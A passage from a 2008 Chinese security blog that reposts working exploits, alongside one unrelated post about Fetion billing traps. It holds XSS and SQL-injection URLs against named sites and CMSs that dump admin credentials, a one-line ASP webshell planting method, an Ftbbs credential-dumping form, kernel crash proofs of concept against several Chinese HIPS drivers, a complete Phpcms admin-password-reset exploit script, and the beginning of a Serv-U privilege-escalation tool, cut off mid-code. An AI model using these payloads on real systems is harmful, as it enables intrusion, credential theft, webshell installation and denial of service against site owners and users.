KOK的博客

搜狐存在多处跨站攻击漏洞

Sun, 05 Oct 2008 10:54:12 +0800

测试代码仅供安全研究

http://db.auto.sohu.com/searchQuery.sip?queryTerm=%3Cscript%3Ealert%28%22tian6%22%29%3C%2Fscript%3E&pageNo=1

http://baodian.women.sohu.com/search.sip?item=<iframe src=http://bbs.tian6.com/ width=200 height=200></iframe>&pageNo=1&type=suggest&onePageNum=10&flag=common&totalText=<iframe src=http://bbs.tian6.com/ width=200 height=200></iframe>&itemText=<iframe src=http://bbs.tian6.com/ width=200 height=200></iframe>&appFlag=true

Tags - 搜狐 , 跨站攻击漏洞

DEDECMS 跨站攻击漏洞

Sun, 05 Oct 2008 10:52:01 +0800

漏洞文件：include/jump.php

以下是漏洞代码：

Copy code<?php
if(!empty($_GET['gurl'])){
echo "<script>location=\"{$_GET['gurl']}\";</script>";
}

http://www.ourwx.com/include/jump.php?gurl=%23"</script><script>alert(/bbs.tian6.com/)</script>

BMForumplugins.phpSQL注入漏洞

Sun, 05 Oct 2008 10:37:07 +0800

PS:我在某百度空间看到此漏洞,但博主非常MJJ,没有写明漏洞发现者,对此向作者表示抱歉.! 请联系我!
发布日期： 2008年一十○月1日上午12时00分
更新日期： 08年十月2日下午4点48分
影响版本： BMForum BMForum 5.6 或其他版本(未测)
讨论
BMForum很容易的SQL注入漏洞，因为它未能充分消毒用户提供的数据，然后用它在一个SQL查询。

开发这一问题可能会允许攻击者妥协的应用，访问或修改数据，或利用潜在的安全漏洞的基本数据库。

BMForum 5.6是脆弱的;其他版本也可能受到影响。

注入方法(仅供安全研究)

http://www.example.com/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1'+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*

Tags - bmforum , sql注入漏洞

南方数据企业注入漏洞

Sun, 05 Oct 2008 10:31:57 +0800

来源：http://www.pcsec.org/

发现日期:

2008-09-25
影响版本: v10.0 v11.0

Exploit:

http://www.southidc.net/0791idc11Q/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

获取shell方法:

在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入"%><%eval(request(chr(35)))%><%'
成功把shell写入http://www.target.com/inc/config.asp
Tags - 南方数据企业 , 注入漏洞

飞信的收费技巧,谨防飞信收费陷阱~

Sat, 04 Oct 2008 11:34:44 +0800

本文来自飞信下载博客 http://www.fetiondownload.cn/post/fetion-shoufei-xianjing.html

大家在下载飞信,使用飞信的时候``有的时候会莫名其妙的发现话费少了`今天飞信下载博客就为大家详细分析一下飞信使用过程中的一些收费陷阱``大家注意避开~~打到万恶的中国移动~~

飞信的收费技巧
飞信软件是中国移动今年6月发布的一款方便、快捷的沟通工具。在许多媒体的广告上中国移动利用“无限量免费”五个字赚足了用户的眼球，

　　但是从两个月的用户反映来看，“免费”其实只是飞信特性中极小的一个部分，适用范围也仅限于“从PC给飞信好友”。加上飞信对手机客户端要求高，用户不能自由选择个性账号。虽然中国移动花费了不菲的广告费用，飞信并没有被用户接受。

　　为你的流量买单

　　飞信目前有两个功能，分别是飞信聊天和飞信交友，你注册以后会以飞信用户和飞信交友用户进行区别。

　　之前飞信的广告中一直宣扬“无限量免费发送短信”，但是据了解，仅仅只有从电脑客户端到手机客户端的短信是免费，如果用开通飞信功能的手机发短信到电脑客户端，必须先登陆软件平台。也就是说，飞信手机用户在登陆后可以享受短信免费服务，但是用户要为自己登录飞信之后所产生的GPRS流量买单。

　　很多用户可能以为移动还是慷慨的，因为基础功能是免收功能费的，短信费用是免收通信费的。短信是免了通信费，但流量费却是很多人看不见摸不着的。许多移动聊天用户选择飞信正是看中了其随时聊天的功能，长时间在线聊天所产生的流量费并不是用户自己可以计算的。

　　悄悄收你朋友的费

　　在某著名手机论坛上，一名名为“sunny”的网友讲述了自己上当的经过。

　　“因为经常上网的缘故，加上前段时间我的智能手机维修，突然发现给朋友发短信很不方便，后来看网站上大肆在推广中国移动推出的飞信软件，正在公测，公测期间免费，以后预期每月收5元，不限条数，这下吸引了我，先开了飞信号开始试用，感觉相当不错，丢失短信的现象极少，就逐步开始加好友。用了3天，正在洋洋得意的向老婆宣扬我的勤俭持家的时候，被老婆一顿痛骂，我用飞信发的短信她收竟然要收费！这下惨了，也就是说我让朋友接受我的飞信短信竟然是花朋友的钱！”

　　来吧，让我们一步步看这名网友是怎样上当的：

　　问题一：你的朋友必须在收到你通过飞信加为好友的提醒后直接回复“Y”才能收到，只有回复之后才能顺利收发短信。

　　问题二：还可以从OUTLOOK里面批量导入，你所有的朋友都要回复“Y”，都成为了飞信的用户。结果就是，你的每个朋友回复Y，其实就是同意用户在接受以161开头的飞信短信的时候同意移动的SP收费一毛！因此，这就成了收短信都要钱了，也就是每条短信的成本，一收一发总共是两毛，你自己是不收费了，可移动一分没少拿。

　　问题三：现在你的面临的选择就是劝说你的朋友都上飞信吧，每个朋友每月都因为你要交每月5元的服务费。

　　接通即要买单

　　飞信的“语音聊天”（以下简称为语音聊天）功能在是用户使用飞信的终端进行与聊天有关的操作的时候，可以启动一个双人或多人的电话会议，即同时有多人通过中国移动的手机同时出现在一个通话中，每个人的说活，其他人都能听到。

　　笔者从中国移动的官方网站了解到：用户a向用户B发出语音聊天的邀请，用户B接受语音邀请后，系统会同时外呼用户A和用户B，如果用户A和用户B任何一方接通电话，而另一方未接通电话，这时，系统会按接通电话的用户的接通时长根据语音聊天的费率计费，未接通电话的用户不计费。

　　所以，在语音聊天的收费中，通话的计费原则是接通即开始计费。飞信的通话由后台呼叫发起，通话的双方都是被呼叫方，所以只要其中一方接听了，另一方也开始被动计费。在此计费原则下，用户可能因为另一方没有接通而没说上一个字，却也要为此买单。

　　由此看来，飞信“免费”对于用户而言绝对不是免费的午餐，用户在使用飞信软件时一定要小心谨慎，提防看不见的收费陷井。

Tags - 飞信 , 收费技巧 , 收费陷阱

Ftbbs 6.X injection 0day exp

Fri, 03 Oct 2008 16:22:01 +0800

漏洞描述: 可以直接获取管理员帐号和MD5加密后的密码

<center><H1>飞天论坛asp版通杀 0day利用程序----by 云中鹰&落叶纷飞</H1></center>
<form method=post name="luoye">
目标地址：<input name="act" type="text" id="act" size="140" value="网址最后要加“/”"><br><br>
注入语句：<input type=text size=150 name=userid value="1 and 1=2 union select 1,2,admin_pwd,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ftbbs_admin"><br><br>
<input type=submit value=Fuck onClick="javascript:luoye.action=document.all.act.value+'haoyou.asp';">

<br><br><br><br>
<font color=red>爆所有管理员用户名时，把admin_pwd改为admin_user</font><br><br>
<font color=red>爆所有论坛用户数据时，把表名改为clubuser，用户名字段是clubuser_nickname；密码字段是clubuser_password</font><br><br>
<font color=red>如果想爆单一用户或管理员的数据，请自行加where语句，参考：id、clubuserid</font><br><br>
<font color=blue>以上是6.3版的注射语句，对于6.8版需要把字段数改为61，并且在字段前加自定义的字段头，默认为“ft_”</font><br><br>

Tags - ftbbs , 飞天论坛 , 注入漏洞

Real-Time Defender 多处内核拒绝服务漏洞

Thu, 02 Oct 2008 15:45:42 +0800

影响版本: Real-Time Defender v1.0

Real-time Defender Professional（简称RTD)是一款主机入侵防护系统。

RTD的最新版本v1.0中存在多处内核拒绝服务漏洞，可导致任意权限用户在安装了RTD的系统上可引发蓝屏。

出问题的组件：ProSecur.sys ,版本：1.1.1.0，CheckSum = 0x00046c99 , TimeStamp = 0x48a51de8

该问题同之前Malware defender的问题类似(http://hi.baidu.com/mj0011/blog/item/464aad31aed4f7ae5fdf0e4f.html）RTD在很多SSDT HOOK函数中，对参数检查不够严格，就将参数传递给系统的 ZwXxx函数，结果引发蓝屏。

示例函数：hk_ZwCreateKey

偏移:0x21f56

测试代码：

WCHAR xx[] = L"xxxx_fuck_rtd";

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwCreateKey");

OBJECT_ATTRIBUTES oba ;
UNICODE_STRING strname ;
strname.Buffer = xx;
strname.Length = wcslen(strname.Buffer) * sizeof(WCHAR) ;

InitializeObjectAttributes(&oba , &strname ,0 , 0,(PVOID)0x80000000);

__asm{

   push 0
    push 0
    push 0
    push 0
    lea eax,oba
    push eax
    push 0
    push 0
    call p

}

return ;

测试程序下载：http://mj0011.ys168.com 漏洞演示目录下BSOD_rtd.rar

Tags - real-time , defender , 多处内核拒绝服务漏洞

Malware Defender 多处内核拒绝服务漏洞

Thu, 02 Oct 2008 10:46:03 +0800

涉及版本 Malware Defender 1.1.3(2008-09-24)及以下版本

Malware Defender(简称MD)是一个HIPS & Anti-Rootkit工具。

Malware Defender最新版本1.1.3(2008-09-24)的内核驱动存在多处内核拒绝服务漏洞，任意权限的用户在安装了MD可引发蓝屏
出问题的组件：mdcore.sys(安装后随机命名）版本1.1.0.0 CheckSum = 0x0003C26C TimeStamp = 0x48d88131

MD在对SSDT HOOK时，存在多处参数检查不全面，同时将可能有错的参数从内核模式传递给系统函数，从而引发系统蓝屏。

示例函数:ZwCreateKey

函数ZwCreateKey的原型是：

NTSTATUS
NtCreateKey(
    __out PHANDLE KeyHandle,
    __in ACCESS_MASK DesiredAccess,
    __in POBJECT_ATTRIBUTES ObjectAttributes,
    __reserved ULONG TitleIndex,
    __in_opt PUNICODE_STRING Class,
    __in ULONG CreateOptions,
    __out_opt PULONG Disposition
    )

其中ObjectAttrutes中的ObjectName , SecurityDescriptor和SecurityQualityOfService域都可以被用来进行缓存拒绝服务攻击.

MD在其HOOK函数hk_ZwCreateKey中（偏移量：0xcd2e)，仅仅对ObjectName域做了有效性检查，判断是一个有效的注册表名，就直接调用ZwOpenKey函数，以传入的ObjectAttributes为参数。

由于在MD的HOOK函数中已经经过中断调用，当前线程的上个模式是UserMode,此时调用ZwOpenKey,再经过一次KiSystemService,会导致系统将当前线程的上个模式改为KernelMode,这样系统函数ZwOpenKey将不会再对ObjectAttributes的所有参数做任何有效性检查，而是直接访问其地址，这样，如果我们传递进一个错误的内核地址的SecurityDescriptor，就会引发系统崩溃，蓝屏重启

实际上在本例中，是经过这样一个调用过程最终蓝屏的ZwCreateKey -> hk_ZwCreateKey -> (检查了ObjectAttributes->ObjectName) -> ZwOpenKey -> 上个模式改为KernelMode,系统不检查参数有效性 ->ObOpenObjectByName -> ObpCaptureObjectCreateInformation -> 系统函数判断SecurityDescriptor域存在，且上个模式为内核模式，因此不做参数检查,直接将参数 ->SeCaptureSecurityDescriptor -> SeCaptureSecurityDescriptor访问错误的SecurityDescriptor地址，系统崩溃蓝屏

测试代码：

HKEY hkey ;

WCHAR xx[] = L"xxxx_fuck_malware_defender";

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwCreateKey");

//获得ZwCreateKey地址

RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE\\" , &hkey);

//随便用一个键句柄作为RootDirectory,以绕过MD的检查

OBJECT_ATTRIBUTES oba ;
UNICODE_STRING strname ;
strname.Buffer = xx;
strname.Length = wcslen(strname.Buffer) * sizeof(WCHAR) ;

InitializeObjectAttributes(&oba , &strname ,0 , hkey,(PVOID)0x80000000);

//填充ObjectAttributes,使ObjectName有效，SecurityDescriptor填入无效的内核地址

IO_STATUS_BLOCK iosb ;
HANDLE hfile ;
__asm{

    push 0
    push 0
    push 0
    push 0
    lea eax,oba
    push eax
    push 0
    push 0
    call p

}

//调用

测试程序下载：http://mj0011.ys168.com 漏洞演示目录下 BSOD_MD.rar
Tags - malware , defender , 多处内核拒绝服务漏洞

中网S3主机安全系统多处内核拒绝服务漏洞

Thu, 02 Oct 2008 10:43:49 +0800

涉及版本中网S3主机安全系2008版本3.5.0.2及以下

中网S3是一款号称4D & 4M齐全的防火墙、HIDS/HIPS软件

其最新版本3.5.0.2及以下所有版本的驱动程序存在多出内核拒绝服务漏洞，可使任何权限用户在安装了中网S3的系统上引发蓝屏

出问题的组件(已验证版本)：NCFileMon.sys ,版本:5.2.3700.0(囧) , CheckSum = 0x00036d61,TimeStamp = 0x46f774e2

驱动中对于SSDT部分函数的inline hook存在参数检查不严格的问题，用户态传入错误参数即可导致驱动出错，引发系统崩溃，蓝屏重启。

示例函数： hk_ZwOpenFile

验证版本函数偏移量:0x97f6

ZwOpenFile的原型是：

NTSTATUS
ZwOpenFile(
    __out PHANDLE FileHandle,
    __in ACCESS_MASK DesiredAccess,
    __in POBJECT_ATTRIBUTES ObjectAttributes,
    __out PIO_STATUS_BLOCK IoStatusBlock,
    __in ULONG ShareAccess,
    __in ULONG OpenOptions
    )

该HOOK函数对于第三个参数ObjectAttributes->ObjectName->Buffer未作有效性验证，只判断了是否为空。另外，由于该HOOK函数体内有结构化异常处理，但是该处理机制只对用户模式地址访问异常有效，因此我们构造错误的内核地址参数，即可引发蓝屏

测试代码：

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwOpenFile");

OBJECT_ATTRIBUTES oba ;
UNICODE_STRING strname ;
strname.Buffer = (PWSTR)0x80000000 ;

oba.ObjectName = &strname ;

IO_STATUS_BLOCK iosb ;
HANDLE hfile ;

__asm{

   push 0
   push 0
   lea eax , iosb
   push eax
   lea eax,oba
   push eax
   push 0x40000000 //set access mask to bypass S3 's check
   lea eax,hfile
   push eax
   call p

}

用户态任意权限的程序运行此代码后，即可引发系统蓝屏重启

测试程序下载：http://mj0011.ys168.com ,漏洞演示目录下 :BSOD_ncS3.rar

另外，S3中验证缓存有效性的方法存在一定问题，虽然较难由用户态主动触发，但有一定引发蓝屏的几率，另外，其校验方法也比正规的参数校验方法消耗更多的CPU时间，因此安装了中网S3主机安全系统的机器可能会有较大程度的非必要性能降低

Tags - 中网s3主机安全系统 , 多处内核拒绝服务漏洞

Phpcms2007 更改管理员密码漏洞

Thu, 02 Oct 2008 10:42:02 +0800

这个漏洞没什么，可能利用上有点意思，简单说下思路：

$mod = $digg_mod;
$digg_setting = cache_read('digg_setting.php');
@extract($digg_setting);
//包含了digg模块的配置文件，并执行了extract
unset($digg_setting);
if ($mod && $id)
//这里的$mod，$id是可以利用的
{
    $table_end = $channelid == 0?'':'_' . $channelid;
    $table_name = $CONFIG['tablepre'] . $mod . $table_end;
    $mod_id = $mod . 'id';
    ......
    {
        $sql = "SELECT * FROM $table_name WHERE $mod_id=$id";
        //这里可以select出需要的任何数据，但是下面并没有比较好的输出数据的地方
    }
    $res = $db->get_one($sql);
    @extract($res);
    //注意这里，这里对select出数据的执行了extract,如果可以控制查询的数据，就可以覆盖任意变量了:)
    ......
    if ($credit_on == 1 && $con && $con != 5 && $con != 0)
    {
        $sql = "SELECT `credit` FROM " . TABLE_MEMBER . " WHERE `username`='$editor'";
        $res_member = $db->get_one($sql);
        if ($res_member)
        {
            if ($con == 3)
            {
                $credit = $res_member['credit'] - $credit_num;
            }
            if ($con == 1 || $con == 2)
            {
                $credit = $res_member['credit'] + $credit_num;
            }
            $db->query("UPDATE " . TABLE_MEMBER . " SET `credit`='$credit' WHERE `username`='$editor'");
            /*
            * 这里就是最终要利用的地方了
            * $credit_on是在digg_setting.php里定义的，但可以利用前面的extract覆盖掉
            * $editor,$credit也利用前面的extract的来覆盖，因为这样是从数据库中查询出的数据，是不受GPC影响的:)
            */
        }
    }

前面就是具体的利用思路，再来说说这个sql语句的构造，因为我们需要$credit_on,$editor,$credit这三个变量，所以要有相应的字段，完整的sql语句如下：

SELECT * FROM [tablepre][table_name],(SELECT 1 AS credit_on,[1',password='[password]' WHERE username='[admin]'#] AS credit,[' UNION SELECT 1#] AS editor) AS [table_name] LIMIT 1# WHERE [mod_id]=[id]

测试代码

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Phpcms 2007 SP6 reset admin password exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by Phpcms 2007"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 4) {
        print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user
host:      target server (ip/hostname)
path:      path to phpcms
user:      admin login name
Example:
php '.$argv[0].' localhost /phpcms/ admin
+---------------------------------------------------------------------------+
');
        exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];

$url = 'http://'.$host.$path.'member/member.php?username='.$user;

send();

if (strpos(file_get_contents($url), 'puret_t') !== false)
        exit("Expoilt Success!\nAdmin New Password:\t123456\n");
else
        exit("Exploit Failed!\n");

function send()
{
        global $host, $path, $user;

        $cmd = 'digg_mod=admin,(SELECT/**/1/**/AS/**/credit_on,0x'.bin2hex('1\',password=\'e10adc3949ba59abbe56e057f20f883e\',email=\'puret_t\',showemail=1 WHERE username=\''.$user.'\'#').'/**/AS/**/credit,0x'.bin2hex('\' UNION SELECT 1#').'/**/AS/**/editor)/**/AS/**/ryat/**/LIMIT/**/1%23&id=1&con=6';

        $message = "POST ".$path."digg/digg_add.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "CLIENT-IP: ".time()."\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;

        $fp = fsockopen($host, 80);
        fputs($fp, $message);

        $resp = '';

        while ($fp && !feof($fp))
                $resp .= fread($fp, 1024);

        return $resp;
}

?>

Tags - phpcms2007 , 更改管理员密码漏洞

PHPCMS 2007获取后台地址漏洞

Thu, 02 Oct 2008 10:36:32 +0800

http://www.url.com/fckeditor/fckconfig.js
保存本地打开搜索.php 就可以看到了
Tags - phpcms , 获取后台地址漏洞

EQ魔法盾 4.0增强版多处内核拒绝服务漏洞

Thu, 02 Oct 2008 10:35:19 +0800

涉及版本 EQ魔法盾 4.0 20080902及以下

EQ魔法盾的驱动程序员对用户态参数检查有一定概念，可惜没有正确理解ProbeForRead的用法，导致几乎所有的SSDT HOOK函数都存在用户态检查不正确的问题,漏洞多达数十处。

此漏洞可导致任意用户权限的程序可以在安装了EQ魔法盾的系统上引发蓝屏

出问题的组件：EQSysSecure.sys ,版本:2008.9.1.26 CheckSum = 0x0001EFD3 TimeStamp = 0x48BAC155

EQ魔法盾的驱动中有这样一个函数 :偏移608d处 sub_16c8d

该函数处于一个带Try..Except的结构中，使用ProbeForRead来检查参数

检查完毕后即直接用户态参数，而实际上，如果传入用户态无效地址，ProbeForRead是不会产生任何反应的，因此读写用户态缓存的代码也必须置于结构化异常处理之中。

这个问题存在于EQ的大部分HOOK函数中，有几十处之多，这里只举出一个例子:

ZwCreateKey,下面是测试代码，运行此代码后安装了EQ魔法盾的系统上即会引发蓝屏重启：

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwCreateKey");

__asm{
   push 0
   push 0
   push 0
   push 0
   push 1
   push 0
   push 0
   call p
}

测试程序下载:http://mj0011.ys168.com ,漏洞演示下BSOD_EQ.rar

Tags - eq魔法盾 , 内核拒绝服务漏洞

微点主动防御多个拒绝服务漏洞及内核漏洞

Thu, 02 Oct 2008 10:33:28 +0800

涉及版本: 微点 version20080924及以下

(1),驱动对ZwOpenEvent的HOOK存在拒绝服务安全漏洞，任何权限用户可以使安装了微点的系统蓝屏

问题在于微点的Hook驱动mp110013.sys对用户态调用ZwOpenEvent传入参数检查不充分导致的

mp110013.sys(版本1.2.10126.0, CheckSum = 0x0000FDB7 , TimeStamp = 0x4859C30E)

偏移0XBAE处实际是其对ZwOpenEvent的HOOK实际处理部分（首先经过一个HOOK引擎mp110003.sys转发）。

ZwOpenEvent的原型是：

NTSTATUS
  ZwOpenEvent(
    OUT PHANDLE  EventHandle,
    IN ACCESS_MASK  DesiredAccess,
    IN POBJECT_ATTRIBUTES  ObjectAttributes
    );

微点只对ObjectAttributes做了ProbeForRead检查，没有对该结构内部成员的缓存地址做有效检查，就直接使用系统函数RtlUnicodeStringToAnsiString将该结构的ObjectAttributes->ObjectName转换为ANSI字符，因此只要RING3的程序对该域填充错误地址，就可以引发系统访问无效内存蓝屏

由于该函数的Hook函数中使用了结构化异常处理，因此传0之类的地址是无法引发蓝屏的，但只要传入任何一个无效的内核地址（例如0x80000000)，就可以使微点蓝屏

下面是引发蓝屏的测试代码：

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwOpenEvent");

OBJECT_ATTRIBUTES oba ;

oba.ObjectName = (PUNICODE_STRING)0x80000000 ;

__asm{
   lea eax ,oba
    push eax
    push 0
    push 0
    call p
}

运行了这段代码后，系统即蓝屏重启，适用于任何安装了微点的系统任何用户权限。

我编写了一个测试程序"BSOD_MP.exe",在装有20080924及以下版本的微点的系统，运行程序后点"done",系统即会蓝屏。

测试程序下载:http://mj0011.ys168.com 漏洞演示目录下BSOD_mp.rar

(2).驱动对ZwOpenThread的HOOK处理存在漏洞，可能导致系统其他组件工作不正常

在同样版本的mp110013.sys中，对于ZwOpenThread的处理存在BUG，可能导致任意调用该函数的其他驱动程序或系统组件失败！

在对ZwOpenThread的HOOK中，微点的驱动没有判断系统上个模式，而是直接使用ProbeForRead函数去校验ZwOpenThread的参数： ObjectAttributes，这样做的结果会导致在驱动中使用该函数的驱动，只要使用了这个参数，调用这个函数就会返回失败。STATUS_ACCESS_DEIND

正确的做法应该是先判断当前线程的前个模式，如果是UserMode,再做有效性校验。

这个函数在驱动中用得不多，但也不是没有，属于微软有文档的函数，例如在Sandboxie的驱动中就有用到这个，如果这个函数失败，沙箱内的进程在执行某些操作的时候，就可能出错，甚至导致系统崩溃。

====================================================

综上来看，微点的驱动开发者对如何校验用户态参数还是有一些概念的，可惜的是，不仅理解不深，而且还会出现一些粗心大意的毛病~象SSDT HOOK这样直面用户态程序的驱动代码，还是要慎之慎之~~

另外这也暴露出，微点的测试流程不够专业，驱动测试不够重视，如果发布前使用BSODHook等Driver Test工具跑一跑，就不会出现如（1）中那样弱智的错误了~

(3). 对ZwDeleteValueKey 的HOOK函数对用户态参数没有做检查，导致任何权限用户在安装了微点的系统上可引发蓝屏

处理函数位于mp110009.sys, 版本:1.2.10045 ,CheckSum = 0xCC78 , TimeStamp = 0x48478FCF

偏移0x12f7处是对ZwDeleteValueKey的HOOK处理函数，该函数的原型是：

NTSTATUS
NtDeleteValueKey(
    __in HANDLE KeyHandle,
    __in PUNICODE_STRING ValueName
    )

微点完全没有检查第二个参数 ValueName的有效性就在其代码偏移0x824处直接取该地址的数据，于是只要传给该参数错误的地址，系统就会立即蓝屏

如下：微点的处理代码：

F8D39815:
mov     eax, [ebp+SourceString]
test    eax, eax
jz       F8D398C0
and     [ebp+ms_exc.disabled], 0
cmp     word ptr [eax], 0 <---memory fault , check by kfuzz
jz      short F8D39833

直接取到参数后判断了下是不是0就直接从内存取出UNICODE_STRING的Length域了

运行以下代码后，该版本微点同样立即蓝屏，这里就不给测试程序了~有兴趣的自己编译了看看

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwDeleteValueKey");
__asm{

   push 0x80000000
   push 0
   call p

}

(4).在对IoCreateFile->Call ObOpenObjectByName的inline hook中，完全未作参数检查，导致任何权限用户在安装了微点的系统上可引发蓝屏

微点Hook了IoCreateFile -> IopCreateFile -> call ObOpenObjectByName，使用替换4字节地址指针的方式。

此时可爱的微点小朋友以为传递给ObOpenObjectByName的参数都已经是已经过内核校验过的了，因此自己不做任何检查，直接使用，甚至连结构化异常处理都不使用.

实际上对IoCreateFile的参数检查到ObOpenOpenByName中才刚刚开始~

结果就导致随便传入错误的参数给ZwCreateFile，就可以引发微点的蓝屏

出问题的模块是mp110011.sys,版本：1.2.10237 ， checksum = 0x0002291a TimeStamp = 0x488944d9

在偏移0x45ca处即使替换ObOpenObjectByName的Hook函数。可以看到微点检查到其DesiredAccess 参数中包含了DELETE权限，就直接从第一个参数ObjectAttributes中取数据，完全不做任何检查。

利用代码，此代码运行后安装有微点的系统将立即蓝屏：

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwCreateFile");

HANDLE filehandle ;
IO_STATUS_BLOCK iosb ;

__asm{

   PUSH 0
   PUSH 0
   push 0
   push 1
   push 0
   push 0
   push 0
   lea eax , iosb
   push eax
   push 0    //ObjectAttributes set to Zero
   push 0x10080 // bypass DELETE access check
   lea eax ,filehandle
   push eax
   call p

}

5).微点对NtWriteFile-> Call ObReferenceObjectByHandle的HOOK中未对参数做有效性检查，可导致任意权限用户在安装了微点的系统上可引发系统蓝屏

存在漏洞的文件:mp110011.sys,版本:1.2.10237,CheckSum = 0x0002291a , TimeStamp = 0x488944d9

微点hook了NtWriteFile-> Call ObReferenceObjectByHandle并对其中的FileHandle进行检查，检查对应的设备对象->驱动对象是否是Disk，如果是的话，判断写入的偏移，进行阻截或放行

其中hook函数使用读取外层函数（NtWriteFile)保存的栈指针(ebp)来读取外层函数的参数pByteOffset,但未对该参数做有效性检查，就直接使用，导致了攻击的可能

使用以下代码即可在任意用户权限在使安装了微点的系统蓝屏：

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwWriteFile");

HANDLE hfile = CreateFile("\\\\.\\PhysicalDrive0" , FILE_WRITE_DATA , 0 , 0 , OPEN_EXISTING , 0 , 0 );
if (hfile != INVALID_HANDLE_VALUE)
{
   __asm
   {
    push 0
    push    1 //->pByteOffset，cannot be zero
    push   0
    push 0
    push 0
    push 0
    push 0
    push 0
    push hfile
    call p

   }
}

(6).微点在对NtOpenProcess的头部inline hook中，未进行任何参数检查就直接使用参数，导致任意权限用户可引发安装了微点的系统蓝屏

mp110013.sys(版本1.2.10126.0, CheckSum = 0x0000FDB7 , TimeStamp = 0x4859C30E)

在其处理函数中未做任何参数检查，直接使用了参数pClientId 的缓存地址，也没有结构化异常处理，因此直接传递0地址即可使系统蓝屏

测试代码：

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "NtOpenProcess");

__asm{
   push 0
   push 0
   push 1   //access must have "PROCESS_TERMINATE"
   push 0
   call p

}

(7).微点对于NtCreateThread的HOOK处理中存在拒绝服务漏洞，可导致任何权限用户在安装了微点的系统上引发蓝屏

mp110013.sys(版本1.2.10126.0, CheckSum = 0x0000FDB7 , TimeStamp = 0x4859C30E)

在其函数中未对参数pContext做任何检查，就使用该参数，并且没有使用任何结构化异常处理，因此只要传0就可以导致蓝屏

测试代码：

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "NtCreateThread");

__asm{

   push 1 //need createsuspend:)
   push 0
   push 0
   push 0
   push 0
   push 0
   push 0
   push 0
   call p

}

Tags - 微点主动防御 , 拒绝服务漏洞 , 内核漏洞

su提权漏洞涉及su7及su7以下版本

Thu, 02 Oct 2008 10:26:26 +0800

信息来源：安全叶子技术小组[J.Leaves Security Team]（http://00day.cn）

一直通杀到su7~~ 可以用来加ftp帐号的......

测试代码(仅供安全研究)

<title>Serv-U TOOL</title>
<style type="text/css">
body {
background-color: #333333;
}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {
  color: #333333;
  border: 1px solid #000000
#;
}
.TextBox {border: 1px solid #084B8E}
body,td,th {
  color: #CCCCCC;
}
</style>
<p align="center">Serv-U Local Add User with ASP</p>
<p align="center">Author: Xiao.K</p>
<form name="form1" method="post" action="">
  <p align="center">
   ------------------Serv-U Information------------------
   <br>
  user:
    <input name="duser" type="text" class="TextBox" id="duser" value="LocalAdministrator">
    <br>
    pwd :
    <input name="dpwd" type="text" class="TextBox" id="dpwd" value="#l@$ak#.lk;0@P">
    <br>
  port:
  <input name="dport" type="text" class="TextBox" id="dport" value="43958">
  <br>
  ---------------------Add User!!! ---------------------
  <BR>
Domain:  
  <input name="domain" type="text" class="TextBox" id="domain" value="secdst" />
  <br>
  FTP USER:
  <input name="fuser" type="text" class="TextBox" id="fuser" value="xiaok">
  <br>
  FTP PASS:
  <input name="fpass" type="text" class="TextBox" id="fpass" value="bbs.secdst.net">
  <br>
  FTP PORT:
  <input name="fport" type="text" class="TextBox" id="fport" value="21">
  <br>
  FTP PATH:
  <input name="fpath" type="text" class="TextBox" id="fpath" value="c:\\">
  <br>
  Privilege
  <select para=value name="privilege">
  <option value=2>Read-only Admin</option>
    <option value=3>Group Admin</option>
    <option value=4>Domain Admin</option>
    <option value=5>System Admin</option>
</select>
  </p>
  <p align="center">


    <input name="radiobutton" type="radio" value="add" checked class="TextBox">
    Add User
    <input type="radio" name="radiobutton" value="del" class="TextBox">
    Del User </p>
  <p align="center">
    <input name="Submit" type="submit" class="buttom" value="Run" />
  </p>
</form>
   <%
user = request.Form("duser")
pass = request.Form("dpwd")
port = request.Form("dport")
domain = request.Form("domain")
fuser = request.Form("fuser")
fpass = request.Form("fpass")
fport = request.Form("fport")
fpath = request.Form("fpath")
privilege=request.Form("privilege")
select case privilege
   case 2:
  privilege="ReadOnly"
   case 3:
  privilege="Group"
   case 4:
  privilege="Domain"
   case 5:
  privilege="System"
  end select
  if request.Form("radiobutton") = "add" Then

loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
